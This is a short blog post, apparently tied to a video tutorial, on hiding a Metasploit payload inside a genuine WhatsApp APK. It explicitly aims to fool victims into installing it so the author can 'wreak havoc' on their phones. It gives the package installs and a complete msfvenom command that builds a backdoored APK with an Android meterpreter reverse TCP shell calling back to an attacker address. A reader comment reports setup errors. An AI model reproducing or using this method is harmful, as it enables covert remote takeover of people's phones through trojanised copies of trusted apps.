Video Tutorials

How to Embed a Metasploit Payload in an Original .Apk File

 

Hey Guys, In this video i show you how to Embed a Metasploit Payload in an Original .Apk File.

Normally we have to install the payload in the victims phone by any means we can, and when the victim runs the application, we would get a direct connection to our victim’s phone remotely and we can use it to wreak havoc on that phone.

But since the app doesn’t look very legit, takes up only a few kBs, and doesn’t show anything when clicked on, the victim will probably uninstall it right away, or worse, wouldn’t install it at all. So we have to solve that problem.

Requirements:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1 apktool

msfvenom -x WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895 -o WhatsApp-backdoored.apk

Video:

About the author

Mazen Elzanaty

3 Comments

Click here to post a comment

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

  • Hey ,
    I’m getting error.
    When I tired to run first command
    E:Unable to locate package lib32ncurses5
    For the second command
    Error: invalid payload : andriod/meterpreter/reverse_tcp

    I have tired for the all payloads andriod/meterpreter/reverse_http so.but I ‘m getting the same.please help me to solve this.

%d bloggers like this: